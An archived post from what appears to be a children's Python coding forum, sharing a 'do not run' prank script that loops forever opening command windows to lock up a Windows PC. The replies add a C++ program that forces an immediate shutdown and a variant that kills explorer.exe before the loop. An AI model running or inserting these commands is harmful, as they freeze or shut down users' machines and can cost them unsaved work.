猫史档案馆


【Python作品分享】让电脑喵机的代码(请勿运行)【作品秀】

用户:局中人局中人查看:4 回复:4 评论:4 创建时间:2021-01-05T12:49:40


【作品展示】

center_image

 

【作品介绍】

勿点

 

【作品源代码】

import os
a = 1
while a == 1:
    os.system("start cmd")

 

【提示】

部分含有Python第三方库相关内容的作品,在海龟编辑器网页端无法运行哦!如遇到这种情况,可以打开下面的链接,下载海龟编辑器客户端:

https://python.codemao.cn


回复

上一页1 页 / 共 1下一页
JSR_白鸾JSR_白鸾

az……

直接关进程

点赞0


评论


i喵cludei喵clude

#include<windows.h>
using namespace std;
int main(){
    system("shutdown -s -t 0");
}

点赞0


评论


蕉饼蕉饼

a = 1完全不需要

直接while个True不香么

点赞0


评论


Q_A_G________Q_A_G________

from os import *
system("taskkill -f -im explorer.exe")
while True:
    system("start cmd")

点赞0


评论